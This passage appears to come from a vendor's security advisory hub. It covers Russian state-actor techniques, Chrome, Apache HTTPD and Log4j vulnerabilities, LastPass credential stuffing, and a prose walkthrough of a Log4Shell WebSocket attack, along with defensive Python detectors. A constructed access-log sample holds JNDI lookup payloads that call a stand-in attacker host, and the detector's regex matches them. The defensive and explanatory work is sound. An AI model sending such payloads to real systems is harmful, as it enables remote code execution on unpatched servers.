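    The review described above can be scripted. The following is an added example (not Blumira’s tooling) that lists script files with the named extensions written inside a time window and not present in a known-good deployment baseline; the paths, timestamps and baseline are constructed.

```python
"""Find recently written server-side script files under a web root.

Added example, not Blumira's tooling.  The paths and timestamps below are
constructed.  scan_webroot() walks a live document root; the pure function
find_new_web_scripts() applies the rule from the article (new .php/.asp/
.aspx/.jsp files in web-accessible directories) so it can be tested
without touching a filesystem.
"""
import os
from datetime import datetime, timedelta

WEB_SHELL_EXTENSIONS = {".php", ".asp", ".aspx", ".jsp"}


def scan_webroot(root):
    """Yield (path, last-modified datetime) for every file under `root`."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            yield path, datetime.fromtimestamp(os.path.getmtime(path))


def find_new_web_scripts(entries, now, window=timedelta(hours=24),
                         baseline=frozenset()):
    """Return paths with a script extension written inside `window` that are
    not in `baseline` (the files the last legitimate deployment is known to
    have written).  The extension match is case-insensitive so mixed-case
    names such as shell.PHP are not missed."""
    cutoff = now - window
    suspicious = []
    for path, mtime in entries:
        ext = os.path.splitext(path)[1].lower()
        if ext in WEB_SHELL_EXTENSIONS and mtime >= cutoff and path not in baseline:
            suspicious.append(path)
    return sorted(suspicious)


# Constructed listing, shaped like scan_webroot() output
NOW = datetime(2022, 2, 24, 12, 0, 0)
SAMPLE_ENTRIES = [
    ("/var/www/html/index.php", NOW - timedelta(days=90)),
    ("/var/www/html/uploads/image.png", NOW - timedelta(hours=2)),
    ("/var/www/html/uploads/cache.PHP", NOW - timedelta(hours=1)),
    ("/var/www/html/admin/health.aspx", NOW - timedelta(hours=3)),
    ("/var/www/html/admin/old.jsp", NOW - timedelta(days=2)),
]
# Files the last legitimate deployment is known to have written
DEPLOY_BASELINE = frozenset({"/var/www/html/admin/health.aspx"})
```

    In production, feed scan_webroot() into find_new_web_scripts() on a schedule and build the baseline from your deployment manifest, so a legitimate release does not page you.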

    Account Manipulation: Exchange Email Delegate Permissions

    In the Russian GRU’s brute-force campaign, threat actors used a PowerShell cmdlet (New-ManagementRoleAssignment) to grant the ‘ApplicationImpersonation’ role to a compromised account. Although PowerShell is a legitimate tool that IT administrators commonly use, attackers can also use it to maintain a foothold or execute malicious code without administrative access.

    Organizations can alert on PowerShell commands and scripts through third-party software or via a security information and event management (SIEM) platform. PowerShell logging is also fairly straightforward to enable in Microsoft Group Policy.

    Learn More About Detecting Malicious PowerShell Activity >

    Privilege Escalation

    Privilege escalation refers to an adversary attempting to gain higher permissions, according to MITRE.

    Valid Accounts: Cloud Accounts

    State-sponsored actors have also used valid credentials of a global admin account to log into the Microsoft 365 admin portal and change permissions of an existing enterprise application.

    To prevent this, correlate logs, including Microsoft 365 logs, from network and host security devices, and assign administrator roles through role-based access control (RBAC) to implement least-privilege principles. Because of its high level of default privilege, use the global admin account only when absolutely necessary; otherwise use the other built-in admin roles within AD.

    Discovery

    File and Network Discovery

    Russian threat actors have also used BloodHound, a tool that can collect information about AD users, groups, and computers, and map pathways to escalate privileges to domain administrator accounts and expedite lateral movement. Robust endpoint detection and response (EDR) software should be able to detect the use and presence of tools like BloodHound on your network.

    Equally important is the ability to send EDR logs to a centralized logging system to correlate with other telemetry sources. This will help identify and contextualize security threats, enabling you to respond quickly and more effectively.

    What You Should Do To Protect Against Russian Cyberattacks

    Knowing how to prevent and detect the known TTPs listed above is a step in the right direction to defend against state-sponsored attacks. Now is also a good time to ensure that you’re enacting basic security principles that will reduce your overall attack surface.

    If you aren’t fully prepared, make changes as soon as possible to ensure that you are secure and patched. This includes doing the following:

    • Reviewing your exposed borders/DMZs to ensure that you are limiting your attack surface. You can use tools such as search.censys.io and shodan.io for this.
    • Deploying Sysmon within your environment if you haven’t yet done so.
    • Enabling MFA via Microsoft 365, Google Workspace (formerly GSuite), Okta, and any other identity provider you are using.
    • If you’re on Microsoft 365, disable legacy authentication wherever you can within your organization.
    • Consider enabling Block macros from running in Microsoft Office files from the Internet through GPO (Group Policy Objects) if you have not yet done so.
    • Notifying all employees to be more aware and cautious and to report any concerning emails or files ASAP.
    • Discussing with your team what you will do in the event that your organization is breached. Planning now will save you time later during an incident.

    Check Your Security Gaps

    Taking time to go through the above steps is one of the best ways you can ensure that you are as protected as possible right now. It’s also important to measure your current security maturity and identify any missing capabilities. Our checklist of the different areas of threat detection and response – from logging to alerting to audits and compliance – can help you identify any security gaps.

    Critical
    February 16, 2022

    Google Patches Chrome Zero-Day (CVE-2022-0609)

    What Happened?

    Google’s Threat Analysis group reported a zero-day vulnerability (CVE-2022-0609) in Chrome that threat actors are currently exploiting in the wild. This is Chrome’s first zero-day of 2022.

    This flaw is a high severity use-after-free vulnerability in the Animation component of Chrome. Not much else is currently known about the bug.

    This vulnerability affects all Chrome users, regardless of which OS is running.

    How Bad is This?

    The complexity of this flaw is not fully known. However, the type of vulnerability and information disclosed by Google leads us to believe it can be triggered without much effort.

    CISA (Cybersecurity and Infrastructure Security Agency) added the CVE to the catalog covered by its Binding Operational Directive, which means that the vulnerability carries a “significant risk to the federal enterprise.”

    What is a Use-After-Free (UAF) Exploit?

    A use-after-free (UAF) vulnerability occurs when a program references memory after it has been freed, which can cause the program to use unexpected values, corrupt valid data, crash, or execute attacker-supplied code, according to MITRE.

    The root cause of UAF exploits can vary, although the two most common causes are exceptional circumstances such as error conditions, and confusion over which part of the program is responsible for freeing memory.

    Google Chrome’s update on Monday addressed four other UAF flaws found in the browser’s Webstore API, File Manager, ANGLE, and GPU, according to Threatpost.

    What Should I Do?

    The latest Chrome update (Chrome 98.0.4758.102) addresses this issue in Windows, Mac and Linux, so users should patch Google Chrome immediately by navigating to the menu and selecting Help>About Google Chrome.

    This new version of Chrome also patches seven other vulnerabilities — including one that received a High severity rating — so it’s important to update as soon as possible.

    Administrators can turn on auto updates in Group Policy. In Group Policy, Windows administrators can navigate to Google>Google Update>Applications, and then enable the policy to Update Policy Override. Then, navigate to Options>Always Allow Updates.

    Mac administrators can turn on auto updates via Google Workspace Managed Browsers, or through a mobile device management (MDM) console.

    Experience Blumira Today

    Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Low
    October 9, 2025

    Here’s What Really Happened With LastPass

    On Tuesday, December 28, tech media outlets began reporting ‘LastPass master passwords may have been compromised’ or ‘Hackers are going after LastPass master passwords’. No surprise here – according to the latest Verizon Data Breach Investigations Report (DBIR), today’s hackers have a preference for stealing credentials over more complex attacks, so password manager accounts are obvious targets for credential stuffing attacks.

    If you lack basic password hygiene (like using strong passwords, changing them on occasion, and never re-using them), your password has probably already been cracked, leaked, or stolen. And, if you use a password manager and don’t follow vendor recommendations and best-practices (like using multi-factor authentication), your password manager will probably get hacked.

    While there seems to have been a recent uptick in credential stuffing attacks targeting LastPass accounts, there doesn’t seem to be any evidence of anything having been breached or compromised – other than LastPass master passwords used in the attacks, which were already compromised.

    Some misinformation seems to be spreading, and we’ve had clients ask us if LastPass was breached or if LastPass was exploited. Inflammatory headlines, new articles citing concerns over LastPass’ use of embedded trackers from earlier this year (which is a genuine privacy concern, but unrelated to potential LastPass compromise) and Tweets like this one don’t really help:

    So, we wrote this blog to summarize what happened, what you should do if you’re a LastPass user, and what any organization can do to detect and respond to credential stuffing attacks.

    What happened?

    Was LastPass hacked? Not exactly. Some LastPass accounts became targets of credential stuffing attacks. According to most of the media coverage, this was first reported on Y Combinator’s Hacker News (HN) forum. In this case, attackers seemed to have obtained the account’s master password (probably from a leaked password database that has nothing to do with LastPass). But, at least some of these attempts were blocked by LastPass’ security tools, and the account was otherwise protected by two-factor authentication (2FA).

    Many other LastPass users replied to the post on HN and stated that they were experiencing similar activity, and that soon began to echo on Reddit, Twitter, and elsewhere.

    This chatter indicates an uptick in credential stuffing attacks targeting LastPass accounts, but there doesn’t seem to be any evidence of account breaches or compromise.

    Here’s the latest statement that LastPass provided to AppleInsider’s request for information:

    “LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted ‘credential stuffing’ activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services,” LastPass spokesperson Meghan Larson told us. “It’s important to note that, at this time, we do not have any indication that accounts were successfully accessed or that the LastPass service was otherwise compromised by an unauthorized party. We regularly monitor for this type of activity and will continue to take steps designed to ensure that LastPass, its users, and their data remain protected and secure.”

    What should LastPass users do?

    First, know this: credential stuffing attacks happen all day every day to LastPass accounts and everything else on the internet, and these attacks rely on credentials that have already been compromised. For that reason, you should be practicing good password hygiene to mitigate the risk of credentials being cracked, leaked, or stolen, and you should use the strongest available multi-factor authentication options wherever possible to protect ALL of your accounts from credential stuffing using compromised credentials. A secure single-sign on solution is one way to implement multi-factor authentication across your applications while improving user experience.

    That being said, LastPass offers security features that users can implement to protect their accounts. For starters, all LastPass tiers (including free personal accounts) support multi-factor authentication (MFA). If you’re not already using MFA, you should go set this up right now.

    For LastPass Premium, Business, and Enterprise users, review your security dashboard and follow guidance to improve your security score. The security dashboard allows you to make sure that all of your users are practicing good password hygiene, avoiding password reuse (a leading cause of credential theft), and avoiding passwords that are already compromised.

    What else can I do to detect and respond to credential stuffing attacks?

    Any security practitioner will tell you that good cyber hygiene is the most effective way to protect against most attacks, and it should be the first line of defense. After that, event logs generated by your systems and applications can provide insights that can be used to improve cyber hygiene, or early-warning signs that can be used to respond to an attack before it results in a breach.

    In order to get insights or early-warning signs from data contained in massive volumes of event logs, the data need to be analyzed and filtered to avoid false-positives and provide actionable alerts. Security Information and Event Management (SIEM) tools exist to solve this problem, and a well-tuned SIEM can be a nightmare for a hacker (or a penetration tester).

    SIEM solutions come in all shapes and sizes. Some solutions are infinitely scalable and extensible but require significant tuning effort (and even development) to use effectively, while others may have a more limited set of features but can be seamlessly integrated with common systems and deployed without much pain.

    Depending on the size of your organization, you may be well-served by engaging a managed security service provider (MSSP) to deploy and manage a SIEM for you, or you may be a good fit for deploying and managing a SIEM in-house.

    How does Blumira prevent credential stuffing attacks?

    Since we’re on the topic of LastPass, we wanted to provide a specific example of a quickly deployable SIEM solution that integrates with LastPass for detecting these types of attacks. We find that Blumira strikes a nice balance between features and configurability while providing out-of-the-box integrations and detections (including LastPass) that require almost no tuning.

    Blumira took us less than a few hours to set up with integrations for LastPass (which only took a few minutes), Duo, Windows and Linux endpoint logs, Microsoft 365, Azure, Cisco, Meraki, and GSuite. During our testing, we were able to trigger findings in Blumira of a LastPass policy violation like this one:

    Among other things, Blumira also watches out for anomalous user behavior in the LastPass environment, and/or activity coming from an IP address with a poor reputation, both of which could help detect attacks like the credential stuffing we’re hearing about in the news right now.

    Ultimately, proper security comes in multiple layers, but none more important than the basics:

    • Good password hygiene
    • MFA all of the things – with security keys or on-device prompts where possible
    • Secure SSO + MFA = even better

    You don’t have to do it alone. Partner with IT security professionals who can guide your security journey and add additional layers of security without impacting end-user productivity.

    For more information about partnering with Blumira — and to learn how you can start using Blumira for free via NFR licensing — visit blumira.com/partners/.

    This was originally published on JTI Cybersecurity’s blog.

    Critical
    December 23, 2021

    Critical Bugs in Apache HTTPD Server: DoS & RCE

    What Happened?

    Two critical flaws were discovered in Apache’s HTTP web server, HTTPD. Threat actors could potentially take advantage of these vulnerabilities to trigger denial of service (DoS) or bypass security policies.

    • CVE-2021-44790 (CVSS 9.8): Could lead to a buffer overflow when parsing multipart content in mod_lua and may enable “a remote attacker to take control of an affected system,” according to CISA. No authentication is required to exploit the vulnerability remotely, although there is no exploit available as of this writing.
    • CVE-2021-44224 (CVSS 8.2): May result in a NULL dereference or Server Side Request Forgery (SSRF) in forward proxy configurations.

    Both vulnerabilities impact Apache HTTP Server 2.4.51 and earlier.

    How Does This Compare To Log4j?

    Although the HTTPD vulnerabilities are unrelated to the recent Log4Shell, they all originate from Apache products.

    Like Log4j, HTTPD is ubiquitous. After Nginx, it is the world’s second most widely used web server, with over 3 million public devices on Shodan that currently run HTTPD. This means that these vulnerabilities could potentially be as far-reaching as Log4j.

    CVE-2021-44790 covers all versions of Apache HTTPD up to 2.4.51; if mod_lua is in use, the potential attack surface expands considerably. Unlike Log4j, this was not a situation where a proof-of-concept exploit was dropped at the same time as the news of the vulnerability. At this point there is no evidence that either CVE has been exploited in the wild. However, now that patches have been released, it’s only a matter of time until an exploit is built.

    How Bad is This?

    Although there are no exploits available yet, threat actors will likely move quickly to develop a weaponized attack due to the potential reach of these CVEs. CVE-2021-44790 has significant impact potential, but does require mod_lua to be utilized. The Lua module for Apache is only supported by version 2.3 and up, so those running lower versions are not at risk.

    CVE-2021-44224 can allow interaction with Unix sockets on the host via SSRF. However, it requires forward proxy functionality to be in use. If you do not have ProxyRequests or ProxyVia defined in your HTTPD configuration, you are likely not at risk.

    There have been a number of other CVEs this year for Apache HTTPD, such as CVE-2021-41773 from October for directory traversal. In general, this should be a reminder to keep your Apache HTTPD up-to-date and be aware as to what modules and configurations are being used. This will significantly enhance your internal security efforts.
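    The two preconditions above (mod_lua loaded for CVE-2021-44790, a forward proxy configured for CVE-2021-44224) can be checked against a configuration file. This is an added example, not Blumira’s tooling; the config snippets and `httpd -v` output are constructed, and it only checks whether the module is loaded, not whether a handler actually routes multipart requests into Lua.

```python
"""Check an Apache HTTPD configuration for the conditions that make
CVE-2021-44790 (mod_lua) and CVE-2021-44224 (forward proxy) reachable.

Added example, not Blumira's tooling.  Config text and version strings are
constructed; version bounds come from the advisory (2.4.51 and earlier
affected, 2.4.52 fixed).  Loading mod_lua is treated as exposure even
though a handler is also needed, because that is the conservative call.
"""
import re

FIXED_VERSION = (2, 4, 52)

# Constructed: output of `httpd -v` on an unpatched and a patched host
VERSION_OLD = "Server version: Apache/2.4.51 (Unix)"
VERSION_NEW = "Server version: Apache/2.4.52 (Unix)"

# Constructed: a config that exposes both CVEs ...
VULN_CONFIG = """
ServerRoot "/etc/httpd"
LoadModule lua_module modules/mod_lua.so
LoadModule proxy_module modules/mod_proxy.so
ProxyRequests On
ProxyVia On
"""
# ... and one where Lua is commented out and forward proxying is off
SAFE_CONFIG = """
ServerRoot "/etc/httpd"
#LoadModule lua_module modules/mod_lua.so
LoadModule proxy_module modules/mod_proxy.so
ProxyRequests Off
"""


def parse_version(text):
    """Turn 'Apache/2.4.51' from `httpd -v` output into a comparable tuple."""
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def strip_comments(config_text):
    """Drop '#' comments so a commented-out LoadModule does not count."""
    return "\n".join(line.split("#", 1)[0] for line in config_text.splitlines())


def assess_httpd(config_text, version_text):
    """Return which of the two CVEs this host's config leaves reachable."""
    cfg = strip_comments(config_text)
    version = parse_version(version_text)
    unpatched = version is not None and version < FIXED_VERSION

    lua_loaded = re.search(r"^\s*LoadModule\s+lua_module\b", cfg, re.M | re.I) is not None
    proxy_requests = re.search(r"^\s*ProxyRequests\s+On\b", cfg, re.M | re.I) is not None
    # ProxyVia is Off by default; any other value means the directive is in use
    proxy_via = re.search(r"^\s*ProxyVia\s+(On|Full|Block)\b", cfg, re.M | re.I) is not None
    forward_proxy = proxy_requests or proxy_via

    return {
        "version": version,
        "unpatched": unpatched,
        "cve_2021_44790_exposed": unpatched and lua_loaded,
        "cve_2021_44224_exposed": unpatched and forward_proxy,
    }
```

    Run it against every vhost and include file, not just httpd.conf, since LoadModule and Proxy* directives are frequently split across conf.d.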

    “Historically we have seen breaches around national holidays because criminals know that security operations centers are often short-staffed, delaying the discovery of intrusions,” reads a White House statement released on December 16.

    What Should I Do?

    Organizations using Apache HTTPD should immediately update to version 2.4.52.

    How To Detect

    There are no exploits available at this point. However, as exploits are derived for these CVEs, we will update detection methods. Because CVE-2021-44224 involves Unix socket access, monitoring socket usage with Osquery or similar tooling will provide enhanced visibility into what is happening in your environment.

    Medium
    December 22, 2021

    Detecting Log4j Exploits Leading to Ransomware

    Threat actors have already begun to exploit the Log4j vulnerability to launch ransomware attacks — and unfortunately, it’s just the tip of the iceberg.

    Ransomware

    Conti was the first professional ransomware group to weaponize the Log4j vulnerability to launch ransomware attacks, and it certainly won’t be the last.

    For opportunistic ransomware groups that operate quickly with purely financial motivations, Log4j is a low-hanging fruit to gain initial access into an environment. To prevent Log4j exploits, you should first evaluate your attack surface and upgrade to Log4j version 2.17.0. Blumira has developed a vulnerability scanner to determine your impact.

    We’ve published recommendations on how to remediate the vulnerability. However, the ubiquitous nature of Log4j means that it’s inherently difficult to patch. That’s why detection is your best bet to stay protected against Log4j-related attacks.

    What Is Log4Shell?

    A zero-day remote code execution (RCE) was discovered in Apache Log4j, a popular Java logging library, which impacts hundreds of enterprise applications. Using this vulnerability, attackers can call external Java libraries via ${jndi:ldap:// and ${jndi:ldaps:// lookup strings and drop shells to deploy the RCE attack without additional effort.

    The Log4j vulnerability, dubbed Log4Shell, provides a relatively easy exploit path for threat actors, since it doesn’t require authentication to take full control of web servers. A JNDI exploit kit has been publicly available for at least two years on GitHub, which enables threat actors to exploit Java web apps vulnerable to JNDI (Java Naming and Directory Interface) injection.

    For an attacker to leverage the Log4j vulnerability, it’s simply a matter of changing the initial attack vector in that exploit kit.
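    Since the lookup string has to reach Log4j through something the application logs (request path, User-Agent, Referer), web access logs are one place to spot probes. The following is an added example, not Blumira’s detection: it scans constructed Apache combined-format lines for ${jndi:<scheme>: after percent-decoding; the log lines and IPs are made up, and the scheme list covers the ldap/ldaps strings above plus rmi and dns, which correspond to the egress ports discussed later in this hub.

```python
"""Flag Log4Shell-style JNDI lookup strings in web server access logs.

Added example, not Blumira's detection.  Log lines are constructed in Apache
combined format.  The request line, Referer and User-Agent are checked
because all three commonly end up in application logs written via Log4j.
"""
import re
from urllib.parse import unquote

# Schemes from the article (ldap/ldaps) plus rmi and dns, matching the
# egress ports (389/636/1099/53) called out in the WebSocket write-up
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.I)

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (documentation-range IPs)
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [12/Dec/2021:10:15:01 +0000] "GET /api/search?q=${jndi:ldap://198.51.100.23:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Dec/2021:10:15:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldaps://198.51.100.23:636/a}"
198.51.100.77 - - [12/Dec/2021:10:16:00 +0000] "GET /login HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0"
203.0.113.9 - - [12/Dec/2021:10:17:00 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
"""


def fully_decode(value):
    """Percent-decode until stable so an encoded lookup is not missed."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded


def find_jndi_probes(log_text):
    """Return one finding per log line that carries a JNDI lookup string:
    {"ip", "field" (req/ref/ua), "scheme"} in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in ("req", "ref", "ua"):
            hit = JNDI_RE.search(fully_decode(m.group(field)))
            if hit:
                findings.append({"ip": m.group("ip"), "field": field,
                                 "scheme": hit.group(1).lower()})
                break
    return findings


def probes_by_source(findings):
    """Collapse findings to {source_ip: count} for blocklist decisions."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts
```

    A match in the access log is a probe, not proof of exploitation; pair it with egress telemetry (an outbound LDAP/RMI connection from the Java process) before treating it as a compromise.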

    How To Detect Log4j-Related Ransomware

    It’s important to understand how to detect the early-stage patterns and techniques associated with an exploitation, so you can stop a threat actor before they can encrypt files and drop the ransomware payload.

    Ransomware groups weaponizing Log4j have used the following techniques:

    Malicious .NET Files

    Khonsari is the first ransomware strain to use the Log4j vulnerability as an attack vector for Windows systems, and its method involves executing a malicious .NET file that encrypts every drive on a vulnerable system except for the C:\ drive. On the C:\ drive, Khonsari only encrypts documents, videos, pictures, downloads and desktop folders.

    To detect this stage in the attack, ensure your security tool, such as an endpoint detection and response (EDR) or security information and event management (SIEM) platform, can detect the presence of malicious files. Blumira, for example, can detect when an application drops a new file or script onto a machine.

    Cobalt Strike

    Microsoft confirmed that it has observed threat actors using Cobalt Strike as they weaponize Log4j. Cobalt Strike is a remote access tool designed for red teaming and penetration testing. However, threat actors often use it for malicious purposes, such as opening up a system’s memory to deliver the ransomware payload.

    To protect against Log4j exploits, ensure that your host detection for Cobalt Strike, Trickbot, and related common attacker tools is functioning as intended and that you have the visibility needed to do so.

    Blumira detects when an attacker is using Cobalt Strike, indicating a user has either been exploited by an outside attacker or an attacker has gained a foothold into your environment.

    Kerberoasting

    Kerberoasting, an attack method used to gain access to passwords for service accounts, was one of the final steps in Conti’s Log4j attack chain before taking control of VMware vCenter servers, according to Threatpost.

    To detect instances of Kerberoasting, you can create a honeytoken that is used solely to act as a canary for attackers.

    Blumira has a detection for Kerberoasting that is automatically built into the platform; you can find it on GitHub.
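    Both this passage and the Kerberoasting section of the Russian TTP write-up earlier on this page recommend a honeytoken. Here is an added example (not Blumira’s GitHub detection) of the alerting side: a constructed canary service account and constructed Windows event 4769 records, where any ticket request naming the canary is critical, and one requester collecting RC4 tickets for several services is a lower-confidence signal. Account names, event fields and thresholds are assumptions.

```python
"""Detect Kerberoasting with a honeytoken service account.

Added example, not Blumira's detection.  Assumes Windows Security event
4769 (Kerberos service ticket requested) is collected with its ServiceName,
TicketEncryptionType, TargetUserName and IpAddress fields.  The canary
account and the event records below are constructed.
"""

# Constructed: an account that exists only as a canary.  It has an SPN so
# it shows up when SPNs are enumerated, but nothing legitimate ever
# requests a ticket for it, so any 4769 naming it is a true positive.
HONEY_SERVICE_ACCOUNTS = {"svc-sqlbackup-hq"}

RC4_HMAC = "0x17"  # ticket encryption type favoured for offline cracking

# Constructed 4769 events (dicts stand in for parsed event XML/JSON)
SAMPLE_4769 = [
    {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-sqlbackup-hq",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc-erp",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"},
    {"TargetUserName": "WS01$@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.9"},
]


def normalise_service(service_name):
    """Reduce 'svc$' or 'svc/host.corp.local' to the bare account name."""
    return service_name.split("/")[0].rstrip("$").lower()


def find_kerberoasting(events, honey=HONEY_SERVICE_ACCOUNTS, rc4_threshold=3):
    """Return findings in order: one critical finding per canary hit, then
    one suspicious finding per requester that pulled RC4 service tickets
    for at least `rc4_threshold` distinct services."""
    findings = []
    rc4_by_requester = {}
    for ev in events:
        svc = normalise_service(ev["ServiceName"])
        if svc in honey:  # encryption type is irrelevant for the canary
            findings.append({"severity": "critical",
                             "requester": ev["TargetUserName"],
                             "service": svc,
                             "source_ip": ev["IpAddress"]})
        if ev["TicketEncryptionType"] == RC4_HMAC and svc != "krbtgt":
            rc4_by_requester.setdefault(ev["TargetUserName"], set()).add(svc)

    for requester, services in rc4_by_requester.items():
        if len(services) >= rc4_threshold:
            findings.append({"severity": "suspicious",
                             "requester": requester,
                             "services": sorted(services)})
    return findings
```

    The RC4 rule will also fire on legacy systems that still negotiate RC4 for every service, so tune the threshold per environment; the canary rule needs no tuning because the account has no legitimate users.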

    Learn More About Log4Shell

    For more information about the Log4Shell vulnerability and how to detect it, watch our on-demand webinar or read our blog post.

    To detect the Log4j-related attack methods listed above that commonly lead to ransomware, test out a free trial of Blumira’s detection and response platform.

    Medium
    December 16, 2021

    Log4Shell Alternative Local Trigger Analysis

    Update 12/20 @ 9 AM ET: Updated to reflect our recommendation to update to Log4j 2.17.0 due to vulnerabilities in prior versions.

    Blumira’s security team discovered the potential for an alternative attack vector in the Log4j vulnerability, which relies on a Javascript WebSocket connection to trigger the RCE on internal and locally exposed unpatched Log4j applications.

    Previously, we understood that the impact of Log4j was limited to vulnerable servers. This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability. At this point, there is no proof of active exploitation.

    This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.

    The client itself generally has no direct control over these WebSocket connections, which can silently initiate when a webpage loads. WebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.

    WebSockets Explained

    WebSockets have been a part of most common browsers over the last 10 years and are used for a number of tasks as users browse. Commonly used for applications like chat and alerts on websites, WebSockets are great at passing timely information back to the browser and allowing the browser to quickly send data back and forth.

    However, WebSockets are accompanied by security risks that are largely unseen. WebSockets are not restricted by the same-origin policy the way a normal cross-domain HTTP request is, and they expect the server itself to validate the Origin of the request. While they are useful, they also introduce a fair amount of risk, as they do not include many security controls to limit their use.

    Previously we saw vulnerabilities associated with cable modems that leveraged WebSockets to send a malicious request to the modem. Similarly, this attack makes malicious requests to potentially vulnerable localhost or local network servers that were not exposed to the internet itself via WebSocket. These days WebSockets are also used for host-fingerprinting and port scanning by measuring the response rates to determine what ports are open; they inherently introduce a variety of risks to the environment.

    Proof-of-Concept Explained

    A walkthrough of the proof-of-concept.

    Step 1: From a machine with the affected Log4j2 vulnerability installed, trigger a file path URL from the browser with a WebSocket connection. In our testing this was a basic JavaScript WebSocket connection, with very little handling of the actual socket connection beyond the path request that initiated on page load. This does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.

    In our testing we utilized one of the many JNDI Exploit kits that leverage existing bypasses for simplified RCE exploitation, but it does depend on the host itself. Our local application contained SpringFramework with Log4j 2.13 and would log out all requests to the server.

    We saw the most success utilizing the exploit kit’s target environment described as “Build in JDK (BYPASS WITH EL by @welk1n) whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath”. However, it’s a simple effort to spin up a large subset of known-good JNDI bypass exploit methods and have the WebSockets try each of these exploit methods per IP and port.

    Step 2: As the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. We saw the most success utilizing RMI (default port 1099), although we are often seeing custom ports used. However, iterating through all available listeners was the easiest path to successful RCE as noted previously. Specific patterns should not be expected as it is easy to trigger traffic passively in the background.

    This technique is similar to WebSocket localhost port scanning used for fingerprinting hosts.

    Step 3: Once the victim’s host hits an open port to a local service or a service accessible to the host itself, it can then drop the JNDI exploit string in path or parameters as seen in the example above. When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process. In the example below, you can see java.exe spawning cmd.exe and executing calc.exe within the user context of the vulnerable Java application.

    Infrastructure Utilized

    Tools

    Attacker Watering Hole: Apache2 server hosting an HTML file. Realistically this could be any server; it just needs to serve the page that initiates the WebSocket connection.

    Victim: 2019 Server with Google Chrome (Version 96.0.4664.110) and localhost:8080 log4j vulnerable application (no egress filtering)

    Attacker 2nd Stage: Ubuntu server running JNDI Exploit Kit

    Suggested Remediation

    To mitigate the risk, we strongly advise organizations to update all local development efforts, internal applications and internet-facing environments to Log4j 2.17.0 as soon as possible, before threat actors can weaponize this exploit further. This means that you should move any custom applications being utilized across your environment to 2.17 in their dependency manifests as soon as possible to avoid incidental exploitation.

    This is also a good time to evaluate egress filtering, which can restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce risk for this attack as you patch applications in the environment. Ensure that only certain machines go out over 53, 389, 636, and 1099 (RMI); all others should be dropped. Attacks that weaponize Log4j often attempt to go out over random high ports. In most situations there is no reason a machine should go out over the internet at 12345, for example.

    Even if you have egress filtering while a machine is on the VPN, that does not mean this could not be incidentally triggered by a developer who left a vulnerable service running while browsing the internet.

    In the short term, using tools like NoScript on untrusted external sites to prevent JavaScript from triggering WebSocket connections will also mitigate this attack; however, this is not a very usable mitigation.

    The identification of vulnerable internal development, applications, and vendors as well as patching to Log4j 2.16 is paramount in resolving this issue.

    To summarize:

    • Update all local development efforts as well as internet-facing environments to Log4j 2.17.0
    • Review and update or implement egress filtering to ensure that callbacks are not successful in many cases
    • Detect when .*/java.exe is the parent process for cmd.exe/powershell.exe – this is potentially very noisy.
    • Ensure that your host detection for exploitation of Cobalt Strike, Trickbot, and related common attacker tools are functioning as intended and that you have the needed visibility to do so.
    • Identify where Log4j is used within your environments. No scanning script is perfect, but there are a number out there that will help at least identify the libraries used locally:
    • Temporary:
      • Implement NoScript on untrusted sites to avoid JavaScript randomly being loaded and initiating WebSockets.
      • Move all local development to https; certificates will likely fail for local development, so wss:// should also fail unless the browser trusts them.

    Learn More

    Matthew Warner, CTO and Co-Founder, will explain how he discovered this attack vector and answer any questions in a recorded livestream. To watch on demand, go here.



    Critical
    December 10, 2021

    Zero-Day RCE Vulnerability CVE-2021-44228 aka Log4Shell Affects Java

